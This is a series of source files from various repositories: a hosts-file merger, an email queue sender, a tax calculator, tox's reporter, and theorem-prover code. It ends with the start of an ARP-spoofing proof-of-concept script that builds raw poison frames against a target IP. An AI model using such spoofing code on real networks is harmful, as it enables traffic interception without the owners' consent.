            #print "computing"
            compute_averages(file_name,cdate,c1,room)
        else:
            print "input problematic"
            print "note that"
            print "column of temperature should be > 0!"
            print "room should be in : ",rooms
    else:
        print "usage: python ",sys.argv[0], "<file_name>", "<date>" , "<temp>" ,"<bedroom/livingroom>"
        print "example: python",sys.argv[0], "TSB001.xlsx 0 1 bedroom"
| {
"repo_name": "tbs1980/Retrofit",
"path": "source/comparison_to_cibse.py",
"copies": "1",
"size": "5772",
"license": "mpl-2.0",
"hash": -3090377895400213500,
"line_mean": 28.6,
"line_max": 171,
"alpha_frac": 0.6055093555,
"autogenerated": false,
"ratio": 2.888888888888889,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.39943982443888887,
"avg_score": null,
"num_lines": null
} |
"""A program to update /etc/hosts from our defintions"""
from __future__ import print_function
import os
import sys
def parse_line(line):
    """Split one hosts-file entry into its IP and the list of host names."""
    fields = line.split()
    return fields[0], fields[1:]
def format_line(ip, names):
    """Render an (ip, names) pair as a hosts-file line.

    Comment/blank entries (names is None) are returned as the raw ip string;
    real entries are formatted as a left-padded IP, a tab, then the names
    sorted alphabetically.
    """
    if names is None:
        return str(ip)
    # sorted() accepts any iterable directly; no need to copy into a list first
    names = sorted(names)
    return '%-16s\t%s' % (ip, ' '.join(names))
def read_host_lines(path_to_hosts):
    """Parse a hosts file into a list of (ip, set_of_names) tuples.

    Comment and blank lines are represented as (raw_line, None) so the
    file can be reconstructed in order.
    """
    lines = []
    # The original used the Python-2-only file() builtin; open() works on
    # both Python 2 and 3, and the with-block guarantees the handle closes.
    with open(path_to_hosts, 'r') as hosts_file:
        for line in hosts_file:
            line = line.rstrip()
            if not line or line[0] == '#':
                parsed = (line, None)
            else:
                parts = line.split()
                parsed = parts[0], set(parts[1:])
            lines.append(parsed)
    return lines
def path_to_etc_hosts():
    """Absolute path of the system-wide hosts file."""
    system_hosts = '/etc/hosts'
    return system_hosts
def path_to_jab_hosts():
    """Absolute path of the personal hosts file under ~/jab.

    The tilde must be expanded explicitly: open() treats '~' literally, so
    the original un-expanded '~/jab/etc/hosts' path could never be read.
    """
    jab = os.path.expanduser('~/jab')
    return os.path.join(jab, 'etc/hosts')
def read_etc_hosts():
    """Parse the system-wide hosts file."""
    system_hosts = path_to_etc_hosts()
    return read_host_lines(system_hosts)
def read_my_hosts():
    """Parse the personal hosts file kept under ~/jab."""
    personal_hosts = path_to_jab_hosts()
    return read_host_lines(personal_hosts)
def _has_names(line):
_ip, names = line
return names is not None
def ip_dict(lines):
    """Map ip -> names for every real host entry in lines, skipping
    comment/blank entries (whose names slot is None)."""
    return {ip: names for ip, names in lines if names is not None}
def merge_hosts(etc_hosts, my_hosts):
    """Merge the personal host entries (my_hosts) into the parsed system
    hosts lines (etc_hosts) and return the merged list of formatted lines.

    IPs already present in etc_hosts get their name sets unioned in place;
    brand-new IPs are appended at the end under an "# Added by ..." banner
    (unless a banner from a previous run is already present).
    """
    extras = ip_dict(my_hosts)
    result = []
    added_line = '# Added by %s' % os.path.basename(sys.argv[0])
    has_added_line = False
    for line in etc_hosts:
        ip, names = line
        new_line = format_line(ip, names)
        if new_line == added_line:
            # banner from a previous run: don't add another one below
            has_added_line = True
        else:
            if has_added_line and not new_line:
                # a blank line terminates the previously-added section
                has_added_line = False
        if _has_names(line) and ip in extras:
            extra_names = extras[ip]
            # NOTE(review): this rewrites the line only when the existing
            # entry has names *not* in extras; arguably the test should be
            # extra_names.difference(names) - confirm the intent.
            if names.difference(extra_names):
                new_line = format_line(ip, names.union(extra_names))
            del extras[ip]
        result.append(new_line)
    extra_lines = []
    for ip, names in extras.items():
        extra_lines.append(format_line(ip, names))
    if extra_lines and not has_added_line:
        extra_lines.insert(0, '#')
        # NOTE(review): uses the full sys.argv[0] here but its basename
        # above, so the banner comparison may never match on later runs.
        extra_lines.insert(1, '# Added by %s' % sys.argv[0])
    result.extend(extra_lines)
    return result
def write_hosts(lines, path_to_hosts):
    """Write the given lines to the given hosts file

    If that is not possible (usually permission denied for /etc/hosts)
    then just write to stdout.

    Returns os.EX_OK on success, os.EX_NOPERM on failure.
    """
    try:
        # open() replaces the Python-2-only file() builtin, and the
        # with-block closes the handle even if a write fails.
        with open(path_to_hosts, 'w') as output:
            for line in lines:
                print(line, file=output)
        return os.EX_OK
    except IOError:
        print('\n'.join(lines))
        return os.EX_NOPERM
def main():
    """Merge the personal hosts entries into /etc/hosts; return exit status."""
    merged = merge_hosts(read_etc_hosts(), read_my_hosts())
    return write_hosts(merged, path_to_etc_hosts())
if __name__ == '__main__':
    # Exit status comes from write_hosts: os.EX_OK, or os.EX_NOPERM when
    # the hosts file is not writable.
    sys.exit(main())
| {
"repo_name": "jalanb/jab",
"path": "src/python/update_hosts.py",
"copies": "2",
"size": "2813",
"license": "mit",
"hash": 95230832230858140,
"line_mean": 24.1160714286,
"line_max": 70,
"alpha_frac": 0.5801635265,
"autogenerated": false,
"ratio": 3.3289940828402367,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4909157609340236,
"avg_score": null,
"num_lines": null
} |
"""A program used for sending emails through Automation."""
# standard library
import argparse
import base64
import json
# third party
import mysql.connector
import requests
# first party
import delphi.operations.secrets as secrets
#Functions to encode and decode messages
def encode(x):
  """Serialize x as JSON and wrap it in a 'b64|'-prefixed base64 envelope."""
  payload = json.dumps(x).encode('utf-8')
  encoded = base64.b64encode(payload).decode('utf-8')
  return 'b64|' + encoded
def decode(x):
  """Inverse of encode(): strip the 'b64|' prefix and parse the JSON."""
  raw = base64.b64decode(x[4:].encode('utf-8'))
  return json.loads(raw.decode('utf-8'))
#Connect to the database as the automation user
def _connect():
  """Return a mysql.connector connection to the `automation` database,
  authenticated with the automation user's credentials from the secrets
  store."""
  u, p = secrets.db.auto
  return mysql.connector.connect(user=u, password=p, database='automation')
#Add an email to the database queue
def queue_email(to, subject, text, cc=None, bcc=None, html=None, attachments=None, priority=1):
  """Insert an email into the `email_queue` table for later delivery.

  Args:
    to: recipient address.
    subject: subject line.
    text: plain-text body (required).
    cc, bcc: optional extra recipients.
    html: optional HTML body.
    attachments: optional list of (file_name, mime_type) pairs.
    priority: higher values are sent first.

  Raises:
    Exception: if the encoded body overflows the database column.
  """
  #Build the body data string
  data = {'text': text}
  if cc is not None:
    data['cc'] = cc
  if bcc is not None:
    data['bcc'] = bcc
  if html is not None:
    data['html'] = html
  if attachments is not None:
    data['attachments'] = attachments
  body = encode(data)
  if len(body) >= 16384:
    raise Exception('Encoded email overflows database field (max=16383|len=%d)'%(len(body)))
  #Connect, queue, commit, and disconnect
  cnx = _connect()
  cur = cnx.cursor()
  # Parameterized query: the driver escapes the values itself. The old
  # version interpolated to/subject/body straight into the SQL string,
  # which was vulnerable to SQL injection (e.g. a quote in the subject).
  cur.execute(
      "INSERT INTO email_queue (`from`, `to`, `subject`, `body`, `priority`, `timestamp`) "
      "VALUES (%s, %s, %s, %s, %s, UNIX_TIMESTAMP(NOW()))",
      (secrets.flucontest.email_epicast, to, subject, body, priority))
  cnx.commit()
  cur.close()
  cnx.close()
#Add an email to the database queue
def call_emailer():
  """Invoke the automation stored procedure (RunStep(2)) that runs the
  email sender."""
  #Connect, call, and disconnect
  cnx = _connect()
  cur = cnx.cursor()
  cur.execute("CALL RunStep(2)")
  cnx.commit()
  cur.close()
  cnx.close()
#Function to send email with the mailgun API
def _send_email(frm, to, subject, body):
  """Send one email through the mailgun HTTP API.

  `body` is either plain text or a 'b64|'-prefixed envelope produced by
  encode() (fields: text, html, cc, bcc, attachments).

  Returns True when mailgun accepts the message, False otherwise.
  """
  auth = ('api', secrets.mailgun.key)
  files = None
  open_handles = []  # attachment file objects, closed in the finally below
  data = {
    'from': frm,
    'to': to,
    'subject': subject,
  }
  #The body is either plain text or a base64 encoded JSON string
  if body[:4] == 'b64|':
    x = decode(body)
    if 'text' not in x:
      raise Exception('Field \'text\' is missing')
    data['text'] = x['text']
    if 'html' in x:
      data['html'] = x['html']
    if 'cc' in x:
      data['cc'] = x['cc']
    if 'bcc' in x:
      data['bcc'] = x['bcc']
    if 'attachments' in x:
      files = []
      for attachment in x['attachments']:
        #Each attachment is (file_name, mime_type)
        if type(attachment[0]) in (list, tuple):
          attachment = attachment[0]
        handle = open(attachment[0], 'rb')
        open_handles.append(handle)
        files.append(('attachment', (attachment[0], handle, attachment[1])))
  else:
    data['text'] = body
  try:
    print('Sending email: %s -> %s "%s"'%(frm, to, subject))
    r = requests.post('https://api.mailgun.net/v2/epicast.net/messages', auth=auth, data=data, files=files)
    return (r.status_code == 200) and (r.json()['message'] == 'Queued. Thank you.')
  except Exception:
    return False
  finally:
    # The original leaked these handles; close them whether or not the
    # request succeeded.
    for handle in open_handles:
      handle.close()
if __name__ == '__main__':
  #Args and usage
  parser = argparse.ArgumentParser()
  parser.add_argument('-v', '--verbose', action='store_const', const=True, default=False, help="show extra output")
  parser.add_argument('-t', '--test', action='store_const', const=True, default=False, help="test run only, don't send emails or update the database")
  parser.add_argument('--limit', type=int, default=100, help="maximum number of emails to send (default 100)")
  args = parser.parse_args()
  #DB connection
  if args.verbose: print('Connecting to the database')
  cnx = _connect()
  select = cnx.cursor()
  update = cnx.cursor()
  if args.verbose: print('Connected successfully')
  #Get the list of emails (status 0 = queued; highest priority first)
  select.execute('SELECT `id`, `from`, `to`, `subject`, `body` FROM `email_queue` WHERE `status` = 0 ORDER BY `priority` DESC LIMIT %d' % args.limit)
  emails = []
  for (email_id, email_from, email_to, email_subject, email_body) in select:
    emails.append({
      "id": email_id,
      "from": email_from,
      "to": email_to,
      "subject": email_subject,
      "body": email_body,
    })
  if args.verbose: print('Found %d email(s)'%(len(emails)))
  #Send emails
  for email in emails:
    if args.verbose: print(' [%s] %s -> %s "%s" (%d)'%(email['id'], email['from'], email['to'], email['subject'], len(email['body'])))
    if args.test: continue
    #Sending in progress (status 2)
    update.execute('UPDATE email_queue SET `status` = 2, `timestamp` = UNIX_TIMESTAMP(NOW()) WHERE `id` = %s'%(email['id']))
    cnx.commit()
    #Send
    success = _send_email(email['from'], email['to'], email['subject'], email['body'])
    #Success (status 1) or failure (status 3)
    if success:
      if args.verbose: print(' Success')
      update.execute('UPDATE email_queue SET `status` = 1, `timestamp` = UNIX_TIMESTAMP(NOW()) WHERE `id` = %s'%(email['id']))
    else:
      if args.verbose: print(' Failure')
      update.execute('UPDATE email_queue SET `status` = 3, `timestamp` = UNIX_TIMESTAMP(NOW()) WHERE `id` = %s'%(email['id']))
    cnx.commit()
  #Cleanup
  cnx.commit()
  select.close()
  update.close()
  cnx.close()
| {
"repo_name": "cmu-delphi/operations",
"path": "src/emailer.py",
"copies": "1",
"size": "5035",
"license": "mit",
"hash": -1152282444913702900,
"line_mean": 33.2517006803,
"line_max": 217,
"alpha_frac": 0.6365441907,
"autogenerated": false,
"ratio": 3.330026455026455,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4466570645726455,
"avg_score": null,
"num_lines": null
} |
# A program written to calculate the income tax
# of individual who make a current amount of money
# during the year
# Written by Adrian Anderson Programmer, 9/11/17

# NOTE(review): tax_dic is never read; only the two parallel lists below
# (tax_rate[i] applies above income_gap[i]) drive the calculation.
tax_dic = {0 : 0, 0.1 : 30000.01, 0.2 : 50000, 0.3 : 100000, 0.35 : 200000, 0.4 : 250000}
tax_rate = [0, 0.1, 0.2, 0.3, 0.35, 0.4]
income_gap = [0, 30000.01, 50000, 100000, 200000, 250000]
counter = 5
income = round(float(input('What is your total income for the year? $')), 2)
# Find the highest bracket the income reaches and deduct that bracket's tax.
while(counter > 0):
    if(income > income_gap[counter]):
        temp = tax_rate[counter] * (income - income_gap[counter])
        income = income - temp
        print('You are taxed at', tax_rate[counter], '%', 'your deduction is $', round(temp, 2))
        break
    else:
        counter -= 1
# Then walk down the remaining brackets, deducting each slice in turn.
# NOTE(review): each deduction is computed from the already-reduced income,
# so the slices compound - confirm that is the intended tax model.
while(counter > 0):
    temp = tax_rate[counter - 1] * (income - income_gap[counter -1])
    income = income - temp
    print('You are taxed at', tax_rate[counter], '%', 'your deduction is $', round(temp, 2))
    counter -= 1
print('Your amount after tax is $' + str(round(income, 2)))
# NOTE(review): dead code - this reassignment is never used afterwards.
tax_dic = {0 : 0, 0.1 : 30000.01, 0.2 : 50000, 0.3 : 100000, 0.35 : 200000, 0.4 : 250000}
| {
"repo_name": "biggapoww/Python-CIS-5",
"path": "tax_calculator.py",
"copies": "1",
"size": "1124",
"license": "mit",
"hash": 6229057931187547000,
"line_mean": 35.2580645161,
"line_max": 96,
"alpha_frac": 0.6138790036,
"autogenerated": false,
"ratio": 2.802992518703242,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8886047284286902,
"avg_score": 0.006164847603267821,
"num_lines": 31
} |
"""A progress reporter inspired from the logging modules"""
from __future__ import absolute_import, unicode_literals
import os
import time
from contextlib import contextmanager
from datetime import datetime
import py
class Verbosity(object):
    """Symbolic names for reporter verbosity levels (verbose minus quiet)."""

    DEBUG = 2
    INFO = 1
    DEFAULT = 0
    QUIET = -1
    EXTRA_QUIET = -2
# Environment variable that, when set to "1", prefixes every reported line
# with the elapsed time since module import (START below is the reference).
REPORTER_TIMESTAMP_ON_ENV = str("TOX_REPORTER_TIMESTAMP")
REPORTER_TIMESTAMP_ON = os.environ.get(REPORTER_TIMESTAMP_ON_ENV, False) == "1"
START = datetime.now()
class Reporter(object):
    """Writes tox output to the terminal, filtered by verbosity.

    The effective verbosity is ``verbose_level - quiet_level``; each log
    method emits its line only when the verbosity reaches its threshold.
    """

    def __init__(self, verbose_level=None, quiet_level=None):
        # only pass through levels that were explicitly given, so _reset's
        # defaults apply otherwise
        kwargs = {}
        if verbose_level is not None:
            kwargs["verbose_level"] = verbose_level
        if quiet_level is not None:
            kwargs["quiet_level"] = quiet_level
        self._reset(**kwargs)

    def _reset(self, verbose_level=0, quiet_level=0):
        self.verbose_level = verbose_level
        self.quiet_level = quiet_level
        self.reported_lines = []  # (category, message) pairs, for inspection
        self.tw = py.io.TerminalWriter()

    @property
    def verbosity(self):
        return self.verbose_level - self.quiet_level

    def log_popen(self, cwd, outpath, cmd_args_shell, pid):
        """log information about the action.popen() created process."""
        msg = "[{}] {}$ {}".format(pid, cwd, cmd_args_shell)
        if outpath:
            # show the log path relative to cwd when it lives under it
            if outpath.common(cwd) is not None:
                outpath = cwd.bestrelpath(outpath)
            msg = "{} >{}".format(msg, outpath)
        self.verbosity1(msg, of="logpopen")

    @property
    def messages(self):
        # just the message text of everything reported so far
        return [i for _, i in self.reported_lines]

    @contextmanager
    def timed_operation(self, name, msg):
        """Log a start line, run the wrapped block, then log its duration.

        NOTE(review): no try/finally, so the "finish" line is skipped when
        the wrapped block raises - confirm that is intended.
        """
        self.verbosity2("{} start: {}".format(name, msg), bold=True)
        start = time.time()
        yield
        duration = time.time() - start
        self.verbosity2(
            "{} finish: {} after {:.2f} seconds".format(name, msg, duration),
            bold=True,
        )

    def separator(self, of, msg, level):
        if self.verbosity >= level:
            # NOTE(review): records a fixed "- summary -" marker regardless
            # of the actual separator message - confirm.
            self.reported_lines.append(("separator", "- summary -"))
            self.tw.sep(of, msg)

    def logline_if(self, level, of, msg, key=None, **kwargs):
        # emit only when the current verbosity reaches the given level;
        # `key` is an optional prefix such as "WARNING: "
        if self.verbosity >= level:
            message = str(msg) if key is None else "{}{}".format(key, msg)
            self.logline(of, message, **kwargs)

    def logline(self, of, msg, **opts):
        self.reported_lines.append((of, msg))
        timestamp = ""
        if REPORTER_TIMESTAMP_ON:
            # elapsed time since module import, as an opt-in prefix
            timestamp = "{} ".format(datetime.now() - START)
        line_msg = "{}{}\n".format(timestamp, msg)
        self.tw.write(line_msg, **opts)

    def keyvalue(self, name, value):
        # write "name value" with the name in bold
        if name.endswith(":"):
            name += " "
        self.tw.write(name, bold=True)
        self.tw.write(value)
        self.tw.line()

    def line(self, msg, **opts):
        self.logline("line", msg, **opts)

    def info(self, msg):
        self.logline_if(Verbosity.DEBUG, "info", msg)

    def using(self, msg):
        self.logline_if(Verbosity.INFO, "using", msg, "using ", bold=True)

    def good(self, msg):
        self.logline_if(Verbosity.QUIET, "good", msg, green=True)

    def warning(self, msg):
        self.logline_if(Verbosity.QUIET, "warning", msg, "WARNING: ", red=True)

    def error(self, msg):
        self.logline_if(Verbosity.QUIET, "error", msg, "ERROR: ", red=True)

    def skip(self, msg):
        self.logline_if(Verbosity.QUIET, "skip", msg, "SKIPPED: ", yellow=True)

    def verbosity0(self, msg, **opts):
        self.logline_if(Verbosity.DEFAULT, "verbosity0", msg, **opts)

    def verbosity1(self, msg, of="verbosity1", **opts):
        self.logline_if(Verbosity.INFO, of, msg, **opts)

    def verbosity2(self, msg, **opts):
        self.logline_if(Verbosity.DEBUG, "verbosity2", msg, **opts)

    def quiet(self, msg):
        self.logline_if(Verbosity.QUIET, "quiet", msg)
# Module-level singleton reporter; the functions and bound-method aliases
# below expose it as the module API.
_INSTANCE = Reporter()


def update_default_reporter(quiet_level, verbose_level):
    # reconfigure the singleton in place so the existing aliases keep working
    _INSTANCE.quiet_level = quiet_level
    _INSTANCE.verbose_level = verbose_level


def has_level(of):
    return _INSTANCE.verbosity > of


def verbosity():
    return _INSTANCE.verbosity


# Bound methods of the singleton, re-exported as module-level functions.
verbosity0 = _INSTANCE.verbosity0
verbosity1 = _INSTANCE.verbosity1
verbosity2 = _INSTANCE.verbosity2
error = _INSTANCE.error
warning = _INSTANCE.warning
good = _INSTANCE.good
using = _INSTANCE.using
skip = _INSTANCE.skip
info = _INSTANCE.info
line = _INSTANCE.line
separator = _INSTANCE.separator
keyvalue = _INSTANCE.keyvalue
quiet = _INSTANCE.quiet
timed_operation = _INSTANCE.timed_operation
log_popen = _INSTANCE.log_popen
| {
"repo_name": "tox-dev/tox",
"path": "src/tox/reporter.py",
"copies": "2",
"size": "4617",
"license": "mit",
"hash": 3633896165006017500,
"line_mean": 28.4076433121,
"line_max": 79,
"alpha_frac": 0.6170673598,
"autogenerated": false,
"ratio": 3.4871601208459215,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 157
} |
"""A proof assistant, or interactive theorem prover. This implements the
sequent calculus, including maintaining proof state such as context (the set
of symbols to the left of the turnstile) and goals.
Actually, I think the sequent calculus is implemented in MatchAndSubstitute's
try_rule(), along with some rules. Hmm. For example, "forall P, Q, P & Q -> P"
could be a rule, although that's a second order logic rule I think.
So in Hilbert-style deductive systems, it is common to have only modus ponens
and universal generalization as rules of inference, however, you then have
axiom schemas that encompass the rest of propositional logic. Coq has
tactics like "split" for conjunction goals, and "left" and "right" for
disjunction goals.
Basic deduction functions used by most / all search techniques.
This file contains basic stuff that should be independent of any
particular search technique.
"""
from Expression import Expression, CompositeExpression
import MatchAndSubstitute
from MatchAndSubstitute import is_rule, Direction, is_equality
# from pprint import pprint
from typing import List, Mapping, Dict, Sequence, Iterator
from typing import Optional, Union
from typing import TypeVar
# Wish I could make this a NamedTuple, but recursively typed NamedTuples and
# mypy are currently broken, see https://github.com/python/mypy/issues/3836
# class ExprAndParent(NamedTuple):
# expr: Expression
# parent: 'ExprAndParent'
class ExprAndParent:
    """An expression plus a link to the expression it was derived from,
    forming a singly linked chain back to a root (whose parent is None)."""

    _expr: Expression
    # Optional: the root of a derivation chain has no parent.
    _parent: Optional["ExprAndParent"]

    def __init__(
        self, expr: Expression, parent: Optional["ExprAndParent"]
    ) -> None:
        self._expr = expr
        self._parent = parent

    @property
    def expr(self) -> Expression:
        return self._expr

    @property
    def parent(self) -> Optional["ExprAndParent"]:
        """Return type should really be the actual (derived) class of self."""
        return self._parent

    def __repr__(self) -> str:
        return repr(self._expr) + " & parent"
def collect_path(start: Optional[ExprAndParent]) -> List[Expression]:
    """Return the expressions along the parent chain, from `start` down to
    the root (the node whose parent is None).

    The argument is Optional because the loop itself accepts None (yielding
    an empty path); the original annotation claimed it was non-optional.
    """
    ret = []
    while start is not None:
        ret.append(start.expr)
        start = start.parent
    return ret
EAndP = TypeVar("EAndP", bound=ExprAndParent)
class Exprs(Mapping[Expression, EAndP]):
    """Mutable collection of ExprAndParent subclasses. Given an Expr (that
    you just generated), can tell you whether it's already been generated,
    and gives you the ExprAndParent. Also allows you to iterate over the
    exprs. Lookups fall back to the optional parent collection."""

    _exprs_map: Dict[Expression, EAndP]
    _parent: Optional["Exprs"]
    _exprs_rules: List[EAndP]
    _exprs_non_rules: List[EAndP]

    def __init__(
        self, exprs: Sequence[EAndP], parent: Optional["Exprs"] = None
    ) -> None:
        self._parent = parent
        # Rules and non-rules live in separate lists so searches can iterate
        # just one kind; the map indexes both for O(1) membership/lookup.
        self._exprs_non_rules = [e for e in exprs if not is_rule(e.expr)]
        self._exprs_rules = [e for e in exprs if is_rule(e.expr)]
        self._exprs_map = {
            expr.expr: expr
            for expr in self._exprs_non_rules + self._exprs_rules
        }

    def add(self, expr_and_parent: EAndP) -> None:
        """Record a newly generated expression in this collection."""
        if is_rule(expr_and_parent.expr):
            self._exprs_rules.append(expr_and_parent)
        else:
            self._exprs_non_rules.append(expr_and_parent)
        self._exprs_map[expr_and_parent.expr] = expr_and_parent

    def __contains__(self, expr: Expression) -> bool:
        """Used to tell whether or not we've generated this expr before,
        so always checks all parents as well as itself."""
        return bool(
            expr in self._exprs_map or (self._parent and expr in self._parent)
        )

    def __getitem__(self, key: Expression) -> EAndP:
        if key in self._exprs_map:
            return self._exprs_map[key]
        if self._parent is not None:
            return self._parent[key]
        # Raise KeyError (as Mapping requires) instead of the TypeError the
        # original produced by subscripting a None parent.
        raise KeyError(key)

    # Used to iterate over all expressions, to see if a newly generated
    # expression is an instance of any of them, meaning the proof is done.
    def __iter__(self) -> Iterator[Expression]:
        return [expr.expr for expr in self.all_exprs()].__iter__()

    def __len__(self) -> int:
        return len(self._exprs_map) + (len(self._parent) if self._parent else 0)

    def __repr__(self) -> str:
        return "\n".join(str(expr) for expr in self)

    def immediate_rules(self) -> List[EAndP]:
        return self._exprs_rules

    def immediate_non_rules(self) -> List[EAndP]:
        return self._exprs_non_rules

    def all_rules(self) -> List[EAndP]:
        if self._parent:
            return self._parent.all_rules() + self._exprs_rules
        else:
            return self._exprs_rules

    def all_exprs(self) -> List[EAndP]:
        # This won't work in general, because when we add a rule, it will change
        # the index of all elements of exprs_list. Oi.
        return self._exprs_non_rules + self._exprs_rules + (
            self._parent.all_exprs() if self._parent else []
        )

    def equalities(self) -> List[EAndP]:
        # Returns a List, rather than Sequence or Iterable, because Python
        # makes dealing with sequences slightly inconvenient: list's "+" only
        # takes other lists, not sequences. So, concatenating a sequence
        # onto a list is done "temp = [ ... ]; temp.extend(seq); return
        # temp." I'd rather have the clarity of just "return [ ... ] + seq".
        # Bug fix: this used to read self.parent, an attribute that does not
        # exist (the field is _parent), so it raised AttributeError whenever
        # a parent collection was present.
        parent_equalities = self._parent.equalities() if self._parent else []
        return [
            rule for rule in self._exprs_rules if is_equality(rule.expr)
        ] + parent_equalities
# Why do Exprs and ProofState both have parents? I think they must point to
# the same thing, i.e. ProofState._parent.context == ProofState.context._parent.
class ProofState:
    """Working state of a proof search: known expressions (context), goals,
    and a link to a parent state whose collections serve as fallbacks."""

    goals: Exprs[EAndP]
    context: Exprs[EAndP]
    # This really needs to be a list, mapping variable to expression that
    # defines it.
    definitions: Exprs[EAndP]
    _parent: Optional["ProofState"]
    verbosity: int

    def __init__(
        self,
        context: Sequence[ExprAndParent],
        goals: Sequence[ExprAndParent],
        parent: Optional["ProofState"],
        verbosity: int,
    ) -> None:
        self.verbosity = verbosity
        self._parent = parent
        # context and goals are actually not used in any method. So this
        # class is more like a C++ struct than a class. Yikes!
        # (NOTE(review): try_rule()/try_all_rules() below do read them.)
        self.context = Exprs(context, getattr(parent, "context", None))
        # Only the "brute force" constructor takes a second argument here,
        # which is I think why PyCharm is complaining.
        self.goals = Exprs(goals, getattr(parent, "goals", None))

    def _is_instance(self, expr: Expression, rule: Expression):
        """Wraps MatchAndSubstitute.is_instance to print if verbose."""
        subs = MatchAndSubstitute.is_instance(expr, rule)
        if self.verbosity > 0 and subs is not None:
            print(
                str(expr)
                + " is an instance of "
                + str(rule)
                + " subs "
                + str(subs)
                + " !!!!!!"
            )
        return subs

    def _match_against_exprs(
        self, move: Expression, targets: Mapping[Expression, EAndP]
    ) -> Optional[EAndP]:
        """Determines whether move equals or is_instance any
        element of targets.

        If so, returns the element. If not, returns None.

        From self, only uses verbosity.
        """
        # cheap exact-match lookup first ...
        if move in targets:
            return targets[move]

        # ... then the more expensive pattern-match against each target
        return next(
            (
                targets[target]
                for target in targets
                if self._is_instance(move, target) is not None
            ),
            None,
        )

    def try_rule(
        self, rule: Expression, expr_and_parent_in: EAndP, direction: Direction
    ) -> Union[bool, List[Expression]]:
        """Applies "rule" to "expr_and_parent_in", updating self with
        generated expressions.

        A wrapper around MatchAndSubstitute.try_rule().

        If that finishes the proof, returns path from start to goal.
        Otherwise, adds the any expressions to context (if forward) or
        goals (if backward), and returns a bool as to whether or not it at
        least generated a new expression.
        """
        assert isinstance(rule, CompositeExpression)
        assert is_rule(rule)
        assert direction == Direction.FORWARD or direction == Direction.BACKWARD

        # For return type, could really use one of those "value or error" types,
        # so that if callers don't get the bool, they'll return right away too.

        # Forward chaining grows the context and tries to hit a goal;
        # backward chaining grows the goals and tries to hit the context.
        already_seen: Exprs[EAndP]
        targets: Exprs[EAndP]
        if direction == Direction.FORWARD:
            already_seen = self.context
            targets = self.goals
        else:
            already_seen = self.goals
            targets = self.context

        exprs = MatchAndSubstitute.try_rule(
            rule, expr_and_parent_in.expr, direction
        )

        if self.verbosity >= 10 or (self.verbosity > 0 and exprs):
            print(
                f"try_rule: {rule} transformed {expr_and_parent_in.expr} into {exprs}"
            )

        added = False
        for move in exprs:
            if move in already_seen:
                continue

            move_and_parent = expr_and_parent_in.__class__(
                move, expr_and_parent_in
            )

            # Ideally, in the case of P in B -> P * M == M * P, we'd
            # recognize that the latter is equivalent to the former, and is
            # strictly more useful so we can get rid of the former. But I
            # think that takes some global knowledge of the proof, e.g. that
            # "P in B" doesn't appear in the goal in any form, or in any
            # other premises, etc. So we'll skip that for now.

            found = self._match_against_exprs(move, targets)
            if found:
                # Proof complete: stitch the two parent chains together into
                # a single start-to-goal path.
                if direction == Direction.FORWARD:
                    return list(reversed(collect_path(found))) + collect_path(
                        move_and_parent
                    )
                else:
                    return list(
                        reversed(collect_path(move_and_parent))
                    ) + collect_path(
                        found
                    )
            already_seen.add(move_and_parent)
            added = True

        return added

    # Should this go in a derived class, since its a (brute force) search
    # strategy? Oh well.
    def try_all_rules(
        self, non_rules: List[EAndP], rules: List[EAndP], direction: Direction
    ) -> Union[bool, List[Expression]]:
        """calls try_rule() for each pair of rules and non_rules."""
        made_progress = False
        for cont in non_rules:
            if self.verbosity > 0:
                print("*** " + str(direction) + " *** " + str(cont.expr))
            for rule in rules:
                if self.verbosity >= 10:
                    print("Rule: " + str(rule.expr))
                found = self.try_rule(rule.expr, cont, direction)
                if isinstance(found, bool):
                    made_progress = made_progress or found
                else:
                    # try_rule returned a full proof path: we're done
                    return found
        return made_progress
| {
"repo_name": "martincmartin/MathematiciansAssistant",
"path": "ProofSystem.py",
"copies": "1",
"size": "11232",
"license": "apache-2.0",
"hash": 8800322451541661000,
"line_mean": 35.5863192182,
"line_max": 86,
"alpha_frac": 0.6030092593,
"autogenerated": false,
"ratio": 4.017167381974249,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0002787241920118478,
"num_lines": 307
} |
# A proof of concept ARP spoofer by Erethon
# Please check README.md and LICENSE files.
# The purpose of this script is stricly educational. It's a proof of concept
# and I haven't really tested it, so I don't know if it will work.
# Once again this is to be used for educational purposes only, I am in no way
# responsible for misuse of it.
# Usage: python arpois.py interface target_ip spoofing_ip.
from binascii import unhexlify
import socket
from sys import argv
from time import sleep
from uuid import getnode
from re import search
import subprocess
def get_src_mac():
    """Return this machine's MAC address as a 6-byte string.

    NOTE(review): hex(getnode())[2:-1] assumes a Python 2 long literal with
    a trailing 'L'; under Python 3 the -1 slice would drop the last hex
    digit - confirm this script only runs under Python 2.
    """
    mac_dec = hex(getnode())[2:-1]
    # left-pad with zeros to the full 12 hex digits before unhexlify
    while (len(mac_dec) != 12):
        mac_dec = "0" + mac_dec
    return unhexlify(mac_dec)
def create_dst_ip_addr():
    """Pack the target IP (argv[2]) into a 4-char string, one chr(octet)
    per byte."""
    octets = argv[2].split(".")
    return ''.join(chr(int(octet)) for octet in octets)
def get_src_ip_addr():
    """Pack the IP being spoofed (argv[3]) into a 4-char string, one
    chr(octet) per byte."""
    octets = argv[3].split(".")
    return ''.join(chr(int(octet)) for octet in octets)
def get_dst_mac_addr():
    """ARPing the target (argv[2]) once on interface argv[1] and return the
    target's MAC address as a 6-byte string."""
    p = subprocess.Popen(["arping", argv[2], "-c", "1", "-i", argv[1]],
                         shell=False, stdout=subprocess.PIPE)
    # give arping a moment to answer before reading its output
    sleep(2)
    remote_mac = search('(([0-9a-f]{2}:){5}[0-9a-f]{2})', p.communicate()[0])
    return unhexlify(remote_mac.group(0).replace(':', ''))
def create_pkt_arp_poison():
    """Build a raw ARP-reply frame claiming argv[3]'s IP maps to our MAC and
    send it to the target (argv[2]) every 2 seconds, forever."""
    # NOTE(review): the third socket() argument is normally a protocol number
    # (e.g. htons(0x0806) for ARP), not SOCK_RAW - confirm this works.
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.SOCK_RAW)
    s.bind((argv[1], 0))
    src_addr = get_src_mac()
    dst_addr = get_dst_mac_addr()
